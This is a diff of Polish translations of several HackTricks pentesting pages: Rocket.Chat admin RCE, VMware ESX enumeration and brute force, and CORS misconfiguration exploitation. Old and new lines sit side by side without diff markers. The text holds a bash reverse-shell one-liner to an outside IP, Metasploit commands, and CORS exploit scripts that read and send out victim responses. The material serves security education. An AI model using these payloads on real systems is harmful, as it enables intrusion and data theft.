<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -23,7 +23,7 @@ Inne sposoby wsparcia HackTricks:
Jeśli jesteś administratorem w Rocket Chat, możesz uzyskać RCE.
* Przejdź do **`Integrations`** i wybierz **`New Integration`** oraz wybierz dowolne: **`Incoming WebHook`** lub **`Outgoing WebHook`**.
* Przejdź do **`Integrations`** i wybierz **`New Integration`** i wybierz dowolne: **`Incoming WebHook`** lub **`Outgoing WebHook`**.
* `/admin/integrations/incoming`
<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>
@ -50,7 +50,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Wywołaj go za pomocą curl i powinieneś otrzymać odwrotną powłokę
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -60,7 +60,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**

12
network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
View file

@ -5,32 +5,30 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Wyliczanie
# Enumeracja
```bash
nmap -sV --script "http-vmware-path-vuln or vmware-version" -p <PORT> <IP>
msf> use auxiliary/scanner/vmware/esx_fingerprint
msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
```
# Bruteforce
Brute force attack is a method used to obtain the user's password by trying all possible combinations until the correct one is found. It is an effective but time-consuming technique.
```bash
msf> auxiliary/scanner/vmware/vmware_http_login
```
Jeśli znajdziesz ważne dane uwierzytelniające, możesz użyć więcej modułów skanera Metasploit do uzyskania informacji.
Jeśli znajdziesz poprawne dane uwierzytelniające, możesz użyć więcej modułów skanera Metasploit do uzyskania informacji.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}

132
pentesting-web/cors-bypass.md
View file

@ -2,11 +2,11 @@
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i stań się ekspertem AWS z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -14,7 +14,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -22,7 +22,7 @@ Inne sposoby wsparcia HackTricks:
Standard Cross-Origin Resource Sharing (CORS) **umożliwia serwerom określenie, kto może uzyskać dostęp do ich zasobów** i **jakie metody żądań HTTP są dozwolone** z zewnętrznych źródeł.
Polityka **tego samego pochodzenia** nakazuje, że **serwer żądający** zasobu i serwer hostujący **zasób** muszą dzielić taki sam protokół (np. `http://`), nazwę domeny (np. `internal-web.com`) i **port** (np. 80). Zgodnie z tą polityką, tylko strony internetowe z tej samej domeny i portu mają dostęp do zasobów.
Polityka **tego samego pochodzenia** nakazuje, że **serwer żądający** zasobu i serwer hostujący **zasób** muszą współdzielić taki sam protokół (np. `http://`), nazwę domeny (np. `internal-web.com`) i **port** (np. 80). Zgodnie z tą polityką, tylko strony internetowe z tej samej domeny i portu mają dostęp do zasobów.
Zastosowanie polityki tego samego pochodzenia w kontekście `http://normal-website.com/example/example.html` jest zilustrowane poniżej:
@ -45,7 +45,7 @@ Ten nagłówek jest **wysyłany przez serwer** w odpowiedzi na żądanie zasobu
### Nagłówek `Access-Control-Allow-Credentials`
Domyślnie, żądania z innych źródeł są wykonywane bez uwierzytelnienia, takiego jak ciasteczka lub nagłówek Autoryzacji. Jednak serwer z innej domeny może zezwolić na odczyt odpowiedzi, gdy przesyłane są uwierzytelnienia, ustawiając nagłówek `Access-Control-Allow-Credentials` na **`true`**.
Domyślnie żądania z innych źródeł są wykonywane bez uwierzytelnienia, takiego jak ciasteczka lub nagłówek Autoryzacji. Jednak serwer z innej domeny może zezwolić na odczyt odpowiedzi, gdy przesyłane są uwierzytelnienia, ustawiając nagłówek `Access-Control-Allow-Credentials` na **`true`**.
Jeśli ustawione jest na `true`, przeglądarka przekaże uwierzytelnienia (ciasteczka, nagłówki autoryzacji lub certyfikaty klienta TLS).
```javascript
@ -74,17 +74,17 @@ xhr.setRequestHeader('Content-Type', 'application/xml');
xhr.onreadystatechange = handler;
xhr.send('<person><name>Arun</name></person>');
```
### Zapytanie wstępne CSRF
### Żądanie wstępne CSRF
### Zrozumienie Zapytań Wstępnych w Komunikacji Między Domenami
### Zrozumienie żądań wstępnych w komunikacji między domenami
Podczas inicjowania żądania między domenami w określonych warunkach, takich jak użycie **niestandardowej metody HTTP** (cokolwiek innego niż HEAD, GET, POST), wprowadzenie nowych **nagłówków**, lub zastosowanie specjalnej wartości nagłówka **Content-Type**, może być konieczne zapytanie wstępne. To wstępne żądanie, wykorzystujące metodę **`OPTIONS`**, służy poinformowaniu serwera o intencjach nadchodzącego żądania między domenami, w tym o metodach HTTP i nagłówkach, jakie ma zamiar użyć.
Podczas inicjowania żądania między domenami w określonych warunkach, takich jak użycie **metody HTTP niestandardowej** (cokolwiek innego niż HEAD, GET, POST), wprowadzenie nowych **nagłówków**, lub użycie specjalnej wartości nagłówka **Content-Type**, może być wymagane żądanie wstępne. To wstępne żądanie, wykorzystujące metodę **`OPTIONS`**, służy poinformowaniu serwera o intencjach nadchodzącego żądania między domenami, w tym o metodach HTTP i nagłówkach, jakie ma zamiar użyć.
Protokół **Cross-Origin Resource Sharing (CORS)** nakazuje tę wstępną kontrolę, aby określić wykonalność żądanej operacji między domenami poprzez weryfikację dozwolonych metod, nagłówków i zaufania pochodzenia. Aby dokładnie zrozumieć, jakie warunki omijają konieczność zapytania wstępnego, zapoznaj się z obszernym przewodnikiem udostępnionym przez [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests).
Protokół **Cross-Origin Resource Sharing (CORS)** nakazuje tę wstępną kontrolę, aby określić wykonalność żądanej operacji między domenami poprzez weryfikację dozwolonych metod, nagłówków i zaufania pochodzenia. Aby dokładnie zrozumieć, jakie warunki omijają konieczność żądania wstępnego, należy zapoznać się z obszernym przewodnikiem udostępnionym przez [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests).
Należy zauważyć, że **brak zapytania wstępnego nie znosi konieczności posiadania nagłówków autoryzacyjnych w odpowiedzi**. Bez tych nagłówków, przeglądarka nie jest w stanie przetworzyć odpowiedzi z żądania między domenami.
Należy zauważyć, że **brak żądania wstępnego nie znosi konieczności posiadania nagłówków autoryzacyjnych w odpowiedzi**. Bez tych nagłówków, przeglądarka nie jest w stanie przetworzyć odpowiedzi z żądania między domenami.
Rozważ poniższą ilustrację zapytania wstępnego mającego na celu użycie metody `PUT` wraz z niestandardowym nagłówkiem o nazwie `Special-Request-Header`:
Rozważ poniższą ilustrację żądania wstępnego mającego na celu użycie metody `PUT` wraz z niestandardowym nagłówkiem o nazwie `Special-Request-Header`:
```
OPTIONS /info HTTP/1.1
Host: example2.com
@ -93,7 +93,7 @@ Origin: https://example.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Authorization
```
W odpowiedzi serwer może zwrócić nagłówki wskazujące akceptowane metody, dozwolony pochodzenie oraz inne szczegóły związane z polityką CORS, jak pokazano poniżej:
W odpowiedzi serwer może zwrócić nagłówki wskazujące akceptowane metody, dozwolony pochodzenie oraz inne szczegóły polityki CORS, jak pokazano poniżej:
```markdown
HTTP/1.1 204 No Content
...
@ -107,18 +107,18 @@ Access-Control-Max-Age: 240
* **`Access-Control-Expose-Headers`**: Poprzez ten nagłówek serwer informuje klienta, które nagłówki mogą być ujawnione jako część odpowiedzi oprócz prostych nagłówków odpowiedzi.
* **`Access-Control-Max-Age`**: Ten nagłówek wskazuje, jak długo wyniki żądania wstępnego mogą być przechowywane w pamięci podręcznej. Serwer ustawia maksymalny czas, w sekundach, przez jaki informacje zwrócone przez żądanie wstępne mogą być ponownie wykorzystane.
* **`Access-Control-Request-Headers`**: Używany w żądaniach wstępnych, ten nagłówek jest ustawiany przez klienta, aby poinformować serwer, które nagłówki HTTP klient chce użyć w rzeczywistym żądaniu.
* **`Access-Control-Request-Method`**: Ten nagłówek, również używany w żądaniach wstępnych, jest ustawiany przez klienta, aby wskazać, który metodę HTTP zostanie użyta w rzeczywistym żądaniu.
* **`Access-Control-Request-Method`**: Ten nagłówek, również używany w żądaniach wstępnych, jest ustawiany przez klienta, aby wskazać, jaka metoda HTTP zostanie użyta w rzeczywistym żądaniu.
* **`Origin`**: Ten nagłówek jest automatycznie ustawiany przez przeglądarkę i wskazuje pochodzenie żądania międzydomenowego. Jest używany przez serwer do oceny, czy przychodzące żądanie powinno być zezwolone czy odrzucone na podstawie polityki CORS.
Należy zauważyć, że zazwyczaj (w zależności od typu zawartości i ustawionych nagłówków) w żądaniu **GET/POST nie jest wysyłane żądanie wstępne** (żądanie jest wysyłane **bezpośrednio**), ale jeśli chcesz uzyskać dostęp do **nagłówków/ciała odpowiedzi**, musi zawierać nagłówek _Access-Control-Allow-Origin_ pozwalający na to.\
Zauważ, że zazwyczaj (w zależności od typu zawartości i ustawionych nagłówków) w żądaniu **GET/POST nie jest wysyłane żądanie wstępne** (żądanie jest wysyłane **bezpośrednio**), ale jeśli chcesz uzyskać dostęp do **nagłówków/ciała odpowiedzi**, musi zawierać nagłówek _Access-Control-Allow-Origin_ pozwalający na to.\
**Dlatego CORS nie chroni przed CSRF (ale może być pomocny).**
### **Żądanie wstępne lokalnej sieci**
1. **`Access-Control-Request-Local-Network`**: Ten nagłówek jest dołączany do żądania klienta, aby oznaczyć, że zapytanie jest skierowane do zasobu w lokalnej sieci. Służy jako znacznik informujący serwer, że żądanie pochodzi z wewnątrz lokalnej sieci.
1. **`Access-Control-Request-Local-Network`**: Ten nagłówek jest dołączany do żądania klienta, aby wskazać, że zapytanie jest skierowane do zasobu w lokalnej sieci. Służy jako znacznik informujący serwer, że żądanie pochodzi z wewnątrz lokalnej sieci.
2. **`Access-Control-Allow-Local-Network`**: W odpowiedzi serwery wykorzystują ten nagłówek, aby przekazać, że żądany zasób może być udostępniany podmiotom spoza lokalnej sieci. Działa jak zielone światło dla udostępniania zasobów między różnymi granicami sieci, zapewniając kontrolowany dostęp przy zachowaniu protokołów bezpieczeństwa.
**Poprawna odpowiedź zezwalająca na żądanie lokalnej sieci** musi również zawierać w odpowiedzi nagłówek `Access-Controls-Allow-Local_network: true`:
A **poprawna odpowiedź zezwalająca na żądanie lokalnej sieci** musi również zawierać w odpowiedzi nagłówek `Access-Controls-Allow-Local_network: true`:
```
HTTP/1.1 200 OK
...
@ -130,22 +130,22 @@ Content-Length: 0
...
```
{% hint style="warning" %}
Należy zauważyć, że adres IP **0.0.0.0** w systemie Linux działa w celu **obejścia** tych wymagań, umożliwiając dostęp do localhost, ponieważ ten adres IP nie jest uważany za "lokalny".
Należy zauważyć, że adres IP **0.0.0.0** w systemie Linux działa w celu **obejścia** tych wymagań dotyczących dostępu do localhost, ponieważ ten adres IP nie jest uważany za "lokalny".
Możliwe jest również **obejście wymagań dotyczących sieci lokalnej**, jeśli użyjesz **publicznego adresu IP lokalnego punktu końcowego** (takiego jak publiczny adres IP routera). Ponieważ w kilku przypadkach, nawet jeśli **publiczny adres IP** jest używany, jeśli jest to **z sieci lokalnej**, dostęp zostanie udzielony.
{% endhint %}
## Wykorzystywane błędy konfiguracyjne
Zauważono, że ustawienie `Access-Control-Allow-Credentials` na **`true`** jest warunkiem koniecznym dla większości **rzeczywistych ataków**. To ustawienie pozwala przeglądarce wysyłać dane uwierzytelniające i odczytywać odpowiedzi, zwiększając skuteczność ataku. Bez tego korzyść z zmuszania przeglądarki do wysłania żądania zamiast samodzielnie tego robić maleje, ponieważ wykorzystanie plików cookie użytkownika staje się niemożliwe.
Zauważono, że ustawienie `Access-Control-Allow-Credentials` na **`true`** jest warunkiem koniecznym dla większości **rzeczywistych ataków**. To ustawienie pozwala przeglądarce na wysyłanie poświadczeń i odczytywanie odpowiedzi, zwiększając skuteczność ataku. Bez tego korzyść z zmuszania przeglądarki do wysłania żądania zamiast samodzielnie tego robić maleje, ponieważ wykorzystanie plików cookie użytkownika staje się niemożliwe.
### Wyjątek: Wykorzystanie Lokalizacji Sieciowej jako Formy Uwierzytelnienia
### Wyjątek: Wykorzystanie Lokalizacji Sieciowej jako Formy Autoryzacji
Istnieje wyjątek, gdzie lokalizacja sieciowa ofiary działa jako forma uwierzytelnienia. Pozwala to na wykorzystanie przeglądarki ofiary jako proxy, omijając uwierzytelnianie oparte na adresie IP w celu uzyskania dostępu do aplikacji sieci wewnętrznej. Ta metoda ma podobne skutki jak przekierowanie DNS, ale jest prostsza do wykorzystania.
Istnieje wyjątek, gdzie lokalizacja sieciowa ofiary działa jako forma autoryzacji. Pozwala to na użycie przeglądarki ofiary jako proxy, omijając autoryzację opartą na adresie IP w celu uzyskania dostępu do aplikacji w sieci wewnętrznej. Ta metoda ma podobne skutki jak przekierowanie DNS, ale jest łatwiejsza do wykorzystania.
### Odzwierciedlenie `Origin` w `Access-Control-Allow-Origin`
Scenariusz rzeczywisty, w którym wartość nagłówka `Origin` jest odzwierciedlana w `Access-Control-Allow-Origin`, jest teoretycznie mało prawdopodobny ze względu na ograniczenia dotyczące łączenia tych nagłówków. Jednak programiści starający się włączyć CORS dla wielu adresów URL mogą dynamicznie generować nagłówek `Access-Control-Allow-Origin`, kopiując wartość nagłówka `Origin`. Ten sposób może wprowadzić podatności, zwłaszcza gdy atakujący używa domeny o nazwie zaprojektowanej tak, aby wydawała się wiarygodna, wprowadzając w błąd logikę walidacji.
Teoretycznie mało prawdopodobny jest scenariusz, w którym wartość nagłówka `Origin` jest odzwierciedlana w `Access-Control-Allow-Origin` z powodu ograniczeń dotyczących łączenia tych nagłówków. Jednak programiści starający się włączyć CORS dla wielu adresów URL mogą dynamicznie generować nagłówek `Access-Control-Allow-Origin`, kopiując wartość nagłówka `Origin`. Ten podejście może wprowadzić podatności, zwłaszcza gdy atakujący używa domeny o nazwie zaprojektowanej tak, aby wydawała się wiarygodna, wprowadzając w błąd logikę walidacji.
```html
<script>
var req = new XMLHttpRequest();
@ -160,7 +160,7 @@ location='/log?key='+this.responseText;
```
### Wykorzystywanie pochodzenia `null`
Pochodzenie `null`, określone dla sytuacji takich jak przekierowania lub lokalne pliki HTML, zajmuje wyjątkową pozycję. Niektóre aplikacje dodają to pochodzenie do białej listy w celu ułatwienia lokalnego rozwoju, co nieumyślnie pozwala dowolnej witrynie na udawanie pochodzenia `null` za pomocą osadzonego iframu, co umożliwia obejście ograniczeń CORS.
Pochodzenie `null`, określone dla sytuacji takich jak przekierowania lub lokalne pliki HTML, zajmuje wyjątkową pozycję. Niektóre aplikacje dodają to pochodzenie do białej listy w celu ułatwienia lokalnego rozwoju, co nieumyślnie pozwala dowolnej witrynie na udawanie pochodzenia `null` za pomocą osadzonego iframu, co umożliwia ominięcie ograniczeń CORS.
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
@ -194,15 +194,15 @@ Podczas napotkania białej listy domen ważne jest przetestowanie możliwości b
Wzorce Regex zazwyczaj koncentrują się na znakach alfanumerycznych, kropce (.), i myślniku (-), pomijając inne możliwości. Na przykład, nazwa domeny stworzona tak, aby zawierać znaki interpretowane inaczej przez przeglądarki i wzorce Regex, może ominąć kontrole bezpieczeństwa. Obsługa znaków podkreślenia w subdomenach przez Safari, Chrome i Firefox ilustruje, jak takie rozbieżności mogą być wykorzystane do obejścia logiki walidacji domeny.
**Aby uzyskać więcej informacji i ustawień tego sprawdzenia bypass:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **i** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
**Aby uzyskać więcej informacji na temat tego sprawdzenia bypass:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **i** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (281).png>)
### Od XSS wewnątrz subdomeny
Programiści często implementują mechanizmy obronne, aby chronić się przed eksploatacją CORS poprzez uwzględnienie na białej liście domen, które mają zezwolenie na żądanie informacji. Pomimo tych środków ostrożności, bezpieczeństwo systemu nie jest niezawodne. Obecność nawet jednej podatnej subdomeny wśród domen z białej listy może otworzyć drzwi do eksploatacji CORS poprzez inne podatności, takie jak XSS (Cross-Site Scripting).
Programiści często implementują mechanizmy obronne, aby chronić się przed eksploatacją CORS poprzez uwzględnianie na białej liście domen, które mają zezwolenie na żądanie informacji. Pomimo tych środków ostrożności, bezpieczeństwo systemu nie jest niezawodne. Obecność nawet jednej podatnej subdomeny wśród domen z białej listy może otworzyć drzwi do eksploatacji CORS poprzez inne podatności, takie jak XSS (Cross-Site Scripting).
Dla ilustracji, rozważmy scenariusz, w którym domena `requester.com` jest na białej liście do dostępu do zasobów z innej domeny, `provider.com`. Konfiguracja po stronie serwera może wyglądać mniej więcej tak:
Dla przykładu, rozważmy scenariusz, w którym domena `requester.com` jest na białej liście do dostępu do zasobów z innej domeny, `provider.com`. Konfiguracja po stronie serwera mogłaby wyglądać mniej więcej tak:
```javascript
if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
// Access data
@ -210,13 +210,13 @@ if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
// Unauthorized access
}
```
W tym ustawieniu dozwolony jest dostęp do wszystkich subdomen `requester.com`. Jednakże, jeśli subdomena, na przykład `sub.requester.com`, zostanie skompromitowana poprzez podatność XSS, atakujący może wykorzystać tę słabość. Na przykład atakujący mający dostęp do `sub.requester.com` mógłby wykorzystać podatność XSS do obejścia zasad CORS i złośliwie uzyskać dostęp do zasobów na `provider.com`.
W tej konfiguracji wszystkie subdomeny `requester.com` mają zezwolenie na dostęp. Jednakże, jeśli subdomena, na przykład `sub.requester.com`, zostanie skompromitowana poprzez podatność XSS, atakujący może wykorzystać tę słabość. Na przykład atakujący mający dostęp do `sub.requester.com` mógłby wykorzystać podatność XSS do ominięcia zasad CORS i złośliwie uzyskać dostęp do zasobów na `provider.com`.
### **Zatrucie pamięci podręcznej po stronie serwera**
[**Z tej publikacji**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
Istnieje możliwość wykorzystania zatrucia pamięci podręcznej po stronie serwera poprzez wstrzyknięcie nagłówka HTTP, co może spowodować wywołanie przechowywanej podatności na Cross-Site Scripting (XSS). Ten scenariusz ma miejsce, gdy aplikacja nie oczyszcza nagłówka `Origin` z nielegalnych znaków, tworząc podatność szczególnie dla użytkowników Internet Explorer i Edge. Te przeglądarki traktują (0x0d) jako prawidłowy terminator nagłówka HTTP, co prowadzi do podatności na wstrzykiwanie nagłówków HTTP.
Istnieje możliwość wykorzystania zatrucia pamięci podręcznej po stronie serwera poprzez wstrzyknięcie nagłówka HTTP, co może spowodować wywołanie przechowywanej podatności na Cross-Site Scripting (XSS). Ten scenariusz ma miejsce, gdy aplikacja nie oczyszcza nagłówka `Origin` z nielegalnych znaków, tworząc podatność szczególnie dla użytkowników Internet Explorer i Edge. Te przeglądarki traktują (0x0d) jako legalny terminator nagłówka HTTP, co prowadzi do podatności na wstrzyknięcie nagłówka HTTP.
Rozważmy poniższe żądanie, w którym manipulowany jest nagłówek `Origin`:
```
@ -229,23 +229,23 @@ HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
```
Podczas bezpośredniego wykorzystania tej podatności poprzez wysłanie błędnego nagłówka przez przeglądarkę internetową nie jest wykonalne, można ręcznie generować spreparowane żądania za pomocą narzędzi takich jak Burp Suite. Ta metoda może spowodować, że serwerowa pamięć podręczna zapisze odpowiedź i nieumyślnie udostępni ją innym. Spreparowany ładunek ma na celu zmianę zestawu znaków strony na UTF-7, kodowanie znaków często kojarzone z podatnościami XSS ze względu na zdolność kodowania znaków w taki sposób, że mogą być wykonane jako skrypt w określonych kontekstach.
Podczas bezpośredniego wykorzystywania tej podatności poprzez wysłanie błędnego nagłówka przez przeglądarkę internetową nie jest wykonalne, można ręcznie generować spreparowane żądania za pomocą narzędzi takich jak Burp Suite. Ta metoda może spowodować zapisanie odpowiedzi w pamięci podręcznej po stronie serwera i przypadkowe udostępnienie jej innym. Spreparowany ładunek ma na celu zmianę zestawu znaków strony na UTF-7, kodowanie znaków często kojarzone z podatnościami XSS ze względu na zdolność kodowania znaków w taki sposób, że mogą być wykonane jako skrypt w określonych kontekstach.
Dla dalszej lektury na temat przechowywanych podatności XSS, zobacz [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
Aby uzyskać więcej informacji na temat podatności stored XSS, zobacz [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
**Uwaga**: Wykorzystanie podatności na wstrzykiwanie nagłówków HTTP, zwłaszcza poprzez zatrucie serwerowej pamięci podręcznej, podkreśla kluczowe znaczenie walidacji i oczyszczania wszystkich dostarczanych przez użytkownika danych, w tym nagłówków HTTP. Zawsze stosuj solidny model bezpieczeństwa, który obejmuje walidację danych wejściowych, aby zapobiec takim podatnościom.
**Uwaga**: Wykorzystanie podatności wstrzykiwania nagłówków HTTP, zwłaszcza poprzez zatrucie pamięci podręcznej po stronie serwera, podkreśla kluczowe znaczenie walidacji i oczyszczania wszystkich dostarczanych przez użytkownika danych, w tym nagłówków HTTP. Zawsze stosuj solidny model bezpieczeństwa, który obejmuje walidację danych, aby zapobiec takim podatnościom.
### **Zatrucie pamięci podręcznej po stronie klienta**
[**Z tej publikacji**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
[Z tej publikacji](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
W tym scenariuszu zaobserwowano instancję strony internetowej odzwierciedlającej zawartość niestandardowego nagłówka HTTP bez odpowiedniego kodowania. Konkretnie, strona internetowa odzwierciedla zawartość zawartą w nagłówku `X-User-id`, który może zawierać złośliwy JavaScript, jak pokazano na przykładzie, gdzie nagłówek zawiera tag obrazu SVG zaprojektowany do wykonania kodu JavaScript podczas ładowania.
W tym scenariuszu zaobserwowano wystąpienie strony internetowej odzwierciedlającej zawartość niestandardowego nagłówka HTTP bez odpowiedniego kodowania. Konkretnie, strona internetowa odzwierciedla zawartość zawartą w nagłówku `X-User-id`, który może zawierać złośliwy JavaScript, jak pokazano na przykładzie, gdzie nagłówek zawiera tag obrazu SVG zaprojektowany do wykonania kodu JavaScript podczas ładowania.
Polityki Cross-Origin Resource Sharing (CORS) pozwalają na wysyłanie niestandardowych nagłówków. Jednakże, bez bezpośredniego renderowania odpowiedzi przez przeglądarkę ze względu na ograniczenia CORS, użyteczność takiego wstrzyknięcia może wydawać się ograniczona. Krytyczny punkt pojawia się przy rozważeniu zachowania pamięci podręcznej przeglądarki. Jeśli nagłówek `Vary: Origin` nie jest określony, staje się możliwe, aby złośliwa odpowiedź została zapisana w pamięci podręcznej przeglądarki. W rezultacie ta zapisana odpowiedź może być renderowana bezpośrednio podczas nawigacji do adresu URL, omijając konieczność bezpośredniego renderowania podczas początkowego żądania. Ten mechanizm zwiększa niezawodność ataku poprzez wykorzystanie pamięci podręcznej po stronie klienta.
Polityki Cross-Origin Resource Sharing (CORS) pozwalają na wysyłanie niestandardowych nagłówków. Jednakże, bez bezpośredniego renderowania odpowiedzi przez przeglądarkę ze względu na ograniczenia CORS, użyteczność takiej wstrzyknięcia może wydawać się ograniczona. Krytyczny punkt pojawia się przy rozważeniu zachowania pamięci podręcznej przeglądarki. Jeśli nagłówek `Vary: Origin` nie jest określony, możliwe staje się zapisanie złośliwej odpowiedzi w pamięci podręcznej przeglądarki. W rezultacie ta zapisana odpowiedź może być renderowana bezpośrednio podczas nawigacji do adresu URL, omijając konieczność bezpośredniego renderowania podczas początkowego żądania. Ten mechanizm zwiększa niezawodność ataku poprzez wykorzystanie pamięci podręcznej po stronie klienta.
Aby zilustrować ten atak, dostarczony jest przykład skryptu JavaScript, zaprojektowanego do wykonania w środowisku strony internetowej, na przykład poprzez JSFiddle. Ten skrypt wykonuje prostą akcję: wysyła żądanie do określonego adresu URL z niestandardowym nagłówkiem zawierającym złośliwy JavaScript. Po pomyślnym zakończeniu żądania, próbuje nawigować do docelowego adresu URL, potencjalnie wywołując wykonanie wstrzykniętego skryptu, jeśli odpowiedź została zapisana w pamięci podręcznej bez właściwego obsługiwania nagłówka `Vary: Origin`.
Aby zilustrować ten atak, dostarczony jest przykład skryptu JavaScript, zaprojektowany do wykonania w środowisku strony internetowej, na przykład za pomocą JSFiddle. Ten skrypt wykonuje prostą akcję: wysyła żądanie pod wskazany adres URL z niestandardowym nagłówkiem zawierającym złośliwy JavaScript. Po pomyślnym zakończeniu żądania, próbuje nawigować do docelowego adresu URL, potencjalnie wywołując wykonanie wstrzykniętego skryptu, jeśli odpowiedź została zapisana w pamięci podręcznej bez właściwego obsługiwania nagłówka `Vary: Origin`.
Oto zwięzłe podsumowanie użytego JavaScriptu do wykonania tego ataku:
Poniżej znajduje się zwięzłe podsumowanie użytego JavaScriptu do wykonania tego ataku:
```html
<script>
function gotcha() { location=url }
@ -261,28 +261,28 @@ req.send();
### XSSI (Cross-Site Script Inclusion) / JSONP
